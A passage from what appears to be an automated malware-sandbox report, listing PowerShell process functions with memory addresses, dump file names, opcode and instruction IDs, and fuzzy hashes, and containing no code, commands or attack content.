                                                                                                                                                                    • Opcode ID: c83fb0c4df0825ba3fee1b7f7e0d515effde79b1ff2efd9937c88f2a18162d96
                                                                                                                                                                    • Instruction ID: ebef2444f04a0612abc707cbd32e5d06f6582ea82e6c568a1a85925eb688d309
                                                                                                                                                                    • Opcode Fuzzy Hash: c83fb0c4df0825ba3fee1b7f7e0d515effde79b1ff2efd9937c88f2a18162d96
                                                                                                                                                                    • Instruction Fuzzy Hash: D2314F93E0FAD61BE763477958750942FA0EE5B66470E02E7C0E94F0A3FA1469478342

                                                                                                                                                                    Executed Functions

                                                                                                                                                                    Function 00007FFD9B966605 Relevance: 1.7, Strings: 1, Instructions: 441COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.2636232326.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9b960000_powershell.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: X7AP
                                                                                                                                                                    • API String ID: 0-2362451188
                                                                                                                                                                    • Opcode ID: 916301f27122fe510ebc501b1cd5c1395af4c7a68b6c29adf92f2eaaa5a826fa
                                                                                                                                                                    • Instruction ID: 8e29ab3ddd5bed51456326baa364b28095620d49e4b681dd7cfcd6af5f21fa32
                                                                                                                                                                    • Opcode Fuzzy Hash: 916301f27122fe510ebc501b1cd5c1395af4c7a68b6c29adf92f2eaaa5a826fa
                                                                                                                                                                    • Instruction Fuzzy Hash: A5D14832A2FB8E9FEBA59B7858645B57BA0EF56310B0901FED05DC70E3DA18A905C341
                                                                                                                                                                    Function 00007FFD9B89604D Relevance: .4, Instructions: 386COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.2629250954.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9b890000_powershell.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: a7f8b05bb0a9cf23d38742808ea13551191520637b8d8ae1ae222de3d0eeefce
                                                                                                                                                                    • Instruction ID: 3ac518922fb6a7500ca514f406fde1436b7c5109de3f22f657052a9be8d26fae
                                                                                                                                                                    • Opcode Fuzzy Hash: a7f8b05bb0a9cf23d38742808ea13551191520637b8d8ae1ae222de3d0eeefce
                                                                                                                                                                    • Instruction Fuzzy Hash: 2711706190E7CA8FDB179B7898745E53FB0EF17244B0A01E7D489CB0B3DA186949C752
                                                                                                                                                                    Function 00007FFD9B899718 Relevance: .2, Instructions: 162COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.2629250954.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9b890000_powershell.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 8bd0f0e4c23f00ef38ed29179d244b6272771cf62c3245d4b65eeb038016d797
                                                                                                                                                                    • Instruction ID: 649a654bf9d42d3f7aa4a4dc7d991de4154f995fcbb7762c00a285dfdab79dec
                                                                                                                                                                    • Opcode Fuzzy Hash: 8bd0f0e4c23f00ef38ed29179d244b6272771cf62c3245d4b65eeb038016d797
                                                                                                                                                                    • Instruction Fuzzy Hash: 72413D72A0EA889FDF189F6C58196A87FE1FB55310F5441BFE098C3253DA20B945C7C2
                                                                                                                                                                    Function 00007FFD9B89A8EC Relevance: .1, Instructions: 116COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.2629250954.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9b890000_powershell.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: f814190e3b404a3da2468c296882c88fbf700c3e311466ed8a893fd9c89efded
                                                                                                                                                                    • Instruction ID: a278dbf56f5230bc03e607c47f61b1476fd2ff336bd38a8ed5d5d00ee08d0b76
                                                                                                                                                                    • Opcode Fuzzy Hash: f814190e3b404a3da2468c296882c88fbf700c3e311466ed8a893fd9c89efded
                                                                                                                                                                    • Instruction Fuzzy Hash: 5031553190DB8C4FDB59CBAC985A6E97FE0EF66320F0441AFC049C7163DA74580ACB92
                                                                                                                                                                    Function 00007FFD9B77EC61 Relevance: .1, Instructions: 73COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.2622329402.00007FFD9B77D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B77D000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9b77d000_powershell.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: c0d10916f1709d193b147d2d54ceb50b45ce44a20522f00d01c8d8ed17f4905d
                                                                                                                                                                    • Instruction ID: 292c1da4cbc6e032d5b3a2feb79d7babe874a0cc9508bd0aca8e64eb466256e5
                                                                                                                                                                    • Opcode Fuzzy Hash: c0d10916f1709d193b147d2d54ceb50b45ce44a20522f00d01c8d8ed17f4905d
                                                                                                                                                                    • Instruction Fuzzy Hash: C611603150CF088FD7A8DF2DE4859663BE0FB98320B11465FD449C7266D731E881CB91
                                                                                                                                                                    Function 00007FFD9B8933B5 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.2629250954.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9b890000_powershell.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                                                                                    • Instruction ID: 790f53b18bf535405e1566ca4fc67868e3ace26fd97990e01e1bad52e7daa871
                                                                                                                                                                    • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                                                                                    • Instruction Fuzzy Hash: 7401A73020CB0C4FDB48EF0CE451AA6B7E0FB89320F10056DE58AC36A1DA32E882CB41
                                                                                                                                                                    Function 00007FFD9B96414D Relevance: .0, Instructions: 37COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.2636232326.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9b960000_powershell.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 9488c1f461d2e22cdc15f909aa9f0a3f2dc3c9a89997f8647269a8befdd5599a
                                                                                                                                                                    • Instruction ID: ce3c2869b2a5237184f9773489b9cb6a4cb2315893c88ecc26a038e8ce54e9ce
                                                                                                                                                                    • Opcode Fuzzy Hash: 9488c1f461d2e22cdc15f909aa9f0a3f2dc3c9a89997f8647269a8befdd5599a
                                                                                                                                                                    • Instruction Fuzzy Hash: 3DF0E232B0E5098FD768EB9CE4519E873E0EF6532071640BAE06DC72B3CA25EC40C781
                                                                                                                                                                    Function 00007FFD9B964400 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.2636232326.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9b960000_powershell.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 4e9b869d45d93e5b1dd0e7403f1555631e9909b8fb19cc1612e1949d2808535f
                                                                                                                                                                    • Instruction ID: 9312d69b85f88b27fb14f6c025b8b8d9dafe08719cba1ba7e4be70795416134c
                                                                                                                                                                    • Opcode Fuzzy Hash: 4e9b869d45d93e5b1dd0e7403f1555631e9909b8fb19cc1612e1949d2808535f
                                                                                                                                                                    • Instruction Fuzzy Hash: 3BF0BE32A0E5498FD765EB9CE0619A873E0EF0532075600BAE05DCB1A3CA26AC40CB40
                                                                                                                                                                    Function 00007FFD9B9641D1 Relevance: .0, Instructions: 29COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.2636232326.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9b960000_powershell.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                                                                                                    • Instruction ID: c307260e9cdd7784a7691b08768f083a0fcbbbef75ed33e7c580895a31fc6b9b
                                                                                                                                                                    • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                                                                                                    • Instruction Fuzzy Hash: ADE01A31B1C808DFDA78DA8CE051AE973E1EBA832171241BBD14EC7671CA22ED518B80
                                                                                                                                                                    Function 00007FFD9B89A2C9 Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.2629250954.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9b890000_powershell.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 1c840c991501e7be4669e7a91bf308631d9dfef5bc329dba03eb946d8fe00010
                                                                                                                                                                    • Instruction ID: 8c9cddaed84f325c485bcda86a76cabf544e5b67ade7e48303af95b0bf5ab05c
                                                                                                                                                                    • Opcode Fuzzy Hash: 1c840c991501e7be4669e7a91bf308631d9dfef5bc329dba03eb946d8fe00010
                                                                                                                                                                    • Instruction Fuzzy Hash: 53E01234804A8C8F8B48EF18C8598E97BA0FF68201B01429BE81DC7520DB719A58CBC2

                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                    Function 00007FFD9B8984E3 Relevance: 6.4, Strings: 5, Instructions: 116COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.2629250954.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9b890000_powershell.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: M_^$M_^$M_^$M_^$M_^
                                                                                                                                                                    • API String ID: 0-2396788759
                                                                                                                                                                    • Opcode ID: 714d6f78c90e1cf6f227a539722912a4582a3f06cd4643867249e615da2cde7c
                                                                                                                                                                    • Instruction ID: 9cfe37af35fdd033f5f568f77627fe57af4185dad0af421d2e7cfe925d172c79
                                                                                                                                                                    • Opcode Fuzzy Hash: 714d6f78c90e1cf6f227a539722912a4582a3f06cd4643867249e615da2cde7c
                                                                                                                                                                    • Instruction Fuzzy Hash: A7314F53E0F6D75BEB63477958790947FA0EE57AA431F03E6C4E88B0A3FD04A94B8241

                                                                                                                                                                    Executed Functions

                                                                                                                                                                    Function 00007FFD9B976605 Relevance: .4, Instructions: 442COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000006.00000002.2620227414.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_6_2_7ffd9b970000_powershell.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: c5ee8a1e9abd96e595a891494186ba2e529d50e31681509d08b42d3e53859699
                                                                                                                                                                    • Instruction ID: dddc89b0979ff1a8470fca386fe6f190c9a4b0c25921b949c3a29ae353bb51af
                                                                                                                                                                    • Opcode Fuzzy Hash: c5ee8a1e9abd96e595a891494186ba2e529d50e31681509d08b42d3e53859699
                                                                                                                                                                    • Instruction Fuzzy Hash: 63D15922A1FB8D1FEBA5DB6848A55B57BE0EF16310B0901FED09DCB0E7DA18AD05C341
                                                                                                                                                                    Function 00007FFD9B8A9718 Relevance: .2, Instructions: 163COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000006.00000002.2609888053.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_6_2_7ffd9b8a0000_powershell.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: a5b285f2f912bc0469d2841251a8f87a4b4f6245ee1348d5de6850a90fa39048
                                                                                                                                                                    • Instruction ID: 1d9f63f4277a121364641d19034799a0fd23b10d6ef936b3b563fa398e0a5f42
                                                                                                                                                                    • Opcode Fuzzy Hash: a5b285f2f912bc0469d2841251a8f87a4b4f6245ee1348d5de6850a90fa39048
                                                                                                                                                                    • Instruction Fuzzy Hash: FF412D71A0EA888FDF189F6C985D6A87FE0FB65310F5441BFD08883253DA24B915C7D2
                                                                                                                                                                    Function 00007FFD9B78E620 Relevance: .1, Instructions: 127COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000006.00000002.2602774916.00007FFD9B78D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B78D000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_6_2_7ffd9b78d000_powershell.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 8f2cfc62da6bf853ec6e55650b79d6eac5f144a557cca6752aa8d669f14d0207
                                                                                                                                                                    • Instruction ID: 3753cefb5a0dc409a49a0af5d27ad77528a6366bb3c3469330fd5c6832d1e1a9
                                                                                                                                                                    • Opcode Fuzzy Hash: 8f2cfc62da6bf853ec6e55650b79d6eac5f144a557cca6752aa8d669f14d0207
                                                                                                                                                                    • Instruction Fuzzy Hash: 3541267150EBC44FE7569B28D8959523FF0EF52321B1A02DFD089CB1B3D625A846C7A2
                                                                                                                                                                    Function 00007FFD9B8AA49C Relevance: .1, Instructions: 99COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000006.00000002.2609888053.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_6_2_7ffd9b8a0000_powershell.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: a0b0d2df15200adf1be970588f51b47a834fd0d48fbb18c9b98774aa52ddcac5
                                                                                                                                                                    • Instruction ID: b1288592844c4293b86b6c9f8e369d0e6e819976823bba125c538806d6c3182a
                                                                                                                                                                    • Opcode Fuzzy Hash: a0b0d2df15200adf1be970588f51b47a834fd0d48fbb18c9b98774aa52ddcac5
                                                                                                                                                                    • Instruction Fuzzy Hash: D321263190C74C4FDB59DBAC984A7E97FF0EB96320F04416BD448C3162DA74A81ACB92
                                                                                                                                                                    Function 00007FFD9B8A33B5 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000006.00000002.2609888053.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_6_2_7ffd9b8a0000_powershell.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                                                                                    • Instruction ID: 2d8e5c199f5335979778887b622e34919a8febb75adba4d6537578fae4bb4e89
                                                                                                                                                                    • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                                                                                    • Instruction Fuzzy Hash: 8601677121CB0D4FD748EF0CE451AA6B7E0FB99364F10056DE58AC36A5DA36E882CB45
                                                                                                                                                                    Function 00007FFD9B8AA0FB Relevance: .0, Instructions: 44COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000006.00000002.2609888053.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_6_2_7ffd9b8a0000_powershell.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 68b2f9dcd8b878d9b9a2ba7870133e00ca2c623ea35f55f65fd9bde032342b5b
                                                                                                                                                                    • Instruction ID: 404341f0b711f3c5e5f97a92626e6117df4e78507d49df3ecec5c54146b1a065
                                                                                                                                                                    • Opcode Fuzzy Hash: 68b2f9dcd8b878d9b9a2ba7870133e00ca2c623ea35f55f65fd9bde032342b5b
                                                                                                                                                                    • Instruction Fuzzy Hash: 6DF0F67660AA8C5FCB91DF2CDC694E87FA0FF66601B0501ABE489C7061DA2159088BD2
                                                                                                                                                                    Function 00007FFD9B97414D Relevance: .0, Instructions: 37COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000006.00000002.2620227414.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_6_2_7ffd9b970000_powershell.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 11d8bb04571b61efb343b02d51918ce64ce82ac9ab8d4d89d5254af000579169
                                                                                                                                                                    • Instruction ID: 12f33f0deeb6a006eecc4bd5a5208b4863b17aefbd46ea5c68febf94c72bccda
                                                                                                                                                                    • Opcode Fuzzy Hash: 11d8bb04571b61efb343b02d51918ce64ce82ac9ab8d4d89d5254af000579169
                                                                                                                                                                    • Instruction Fuzzy Hash: 0DF0BE32B1E5098FD768EA5CE4919A873E0EF6533071640BAE06DC76B3CA25EC40C785
                                                                                                                                                                    Function 00007FFD9B974400 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000006.00000002.2620227414.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_6_2_7ffd9b970000_powershell.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 04ddc4e4dca0313fa1c4408041f8b996914b53924da645ff4070bb2900347b69
                                                                                                                                                                    • Instruction ID: 129b33f44cb8e93545e7d3cdafabe1f671a871c4de9137186345812d3433b547
                                                                                                                                                                    • Opcode Fuzzy Hash: 04ddc4e4dca0313fa1c4408041f8b996914b53924da645ff4070bb2900347b69
                                                                                                                                                                    • Instruction Fuzzy Hash: C8F0BE32A0E5498FD764EA5CE4A09A873E0EF0532076600FAE05DCB1B3CA25AC40CB40
                                                                                                                                                                    Function 00007FFD9B9741D1 Relevance: .0, Instructions: 29COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000006.00000002.2620227414.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_6_2_7ffd9b970000_powershell.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                                                                                                    • Instruction ID: 664ee9e526855705bcffdcfcbd412457206555aceccb5f816b9e306c4c7c1cf4
                                                                                                                                                                    • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                                                                                                    • Instruction Fuzzy Hash: 43E0123171C4089FD678EA4CE0919AD73E5EBA833171241BBD14EC7672CA21ED518B85

                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                    Function 00007FFD9B8A84E3 Relevance: 6.4, Strings: 5, Instructions: 116COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000006.00000002.2609888053.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_6_2_7ffd9b8a0000_powershell.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: L_^$L_^$L_^$L_^$L_^
                                                                                                                                                                    • API String ID: 0-2264858084
                                                                                                                                                                    • Opcode ID: 82c668183529e2c4598b24b01c37c9e8deef4f4016459ffb044718b94410bdd1
                                                                                                                                                                    • Instruction ID: 112e1da33eab6b8e9f3df30a94ac81a8e10c8a285875b1e8b865f6e8eec2c93b
                                                                                                                                                                    • Opcode Fuzzy Hash: 82c668183529e2c4598b24b01c37c9e8deef4f4016459ffb044718b94410bdd1
                                                                                                                                                                    • Instruction Fuzzy Hash: 4C31A353F0FAD61BE363037A48750986FA0EE5BA6435F12F7C4E84B0A3FE0469478261

                                                                                                                                                                    Executed Functions

                                                                                                                                                                    Function 00007FFD9B966605 Relevance: 1.7, Strings: 1, Instructions: 448COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000008.00000002.2679165704.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b960000_powershell.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: X7|5
                                                                                                                                                                    • API String ID: 0-3688954269
                                                                                                                                                                    • Opcode ID: d63667217aa0a9e0504d7323ee30716c1b948f43e26b803c486bd4d25e1e3af9
                                                                                                                                                                    • Instruction ID: 4be7f31c49a9b76796a61e261c837a60bbb34a02e23565176a8a402a02ba1213
                                                                                                                                                                    • Opcode Fuzzy Hash: d63667217aa0a9e0504d7323ee30716c1b948f43e26b803c486bd4d25e1e3af9
                                                                                                                                                                    • Instruction Fuzzy Hash: 27D13732A2FB8E9FEBA99B7858654B57BA0EF16310B0901FFD05DC70E3D918A905C341
                                                                                                                                                                    Function 00007FFD9B89B8DC Relevance: .6, Instructions: 581COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000008.00000002.2672776835.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b890000_powershell.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: b9af4999d9c8286af871cdf8a381bdfffc236a64ecd1c9e52d9ea5253d18882a
                                                                                                                                                                    • Instruction ID: 18ec9f969c597f2b0a76215b85725a31411bab1e5f6aa5be036a273bdb752758
                                                                                                                                                                    • Opcode Fuzzy Hash: b9af4999d9c8286af871cdf8a381bdfffc236a64ecd1c9e52d9ea5253d18882a
                                                                                                                                                                    • Instruction Fuzzy Hash: B1F1F8A3A0F6D64FEB668BA848750E47FE4FF26654B0A01FBD0D48B0E3ED1529078751
                                                                                                                                                                    Function 00007FFD9B89604D Relevance: .4, Instructions: 386COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000008.00000002.2672776835.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b890000_powershell.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: a7f8b05bb0a9cf23d38742808ea13551191520637b8d8ae1ae222de3d0eeefce
                                                                                                                                                                    • Instruction ID: 3ac518922fb6a7500ca514f406fde1436b7c5109de3f22f657052a9be8d26fae
                                                                                                                                                                    • Opcode Fuzzy Hash: a7f8b05bb0a9cf23d38742808ea13551191520637b8d8ae1ae222de3d0eeefce
                                                                                                                                                                    • Instruction Fuzzy Hash: 2711706190E7CA8FDB179B7898745E53FB0EF17244B0A01E7D489CB0B3DA186949C752
                                                                                                                                                                    Function 00007FFD9B899728 Relevance: .2, Instructions: 161COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000008.00000002.2672776835.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b890000_powershell.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 1b8f70b141e364faf8f90345c1eea65e332c8786bae4699b5a7b2299d9fd1c57
                                                                                                                                                                    • Instruction ID: 842251e0e087f9b546b2303f605acc63183787228c167c57de8ef07732d54443
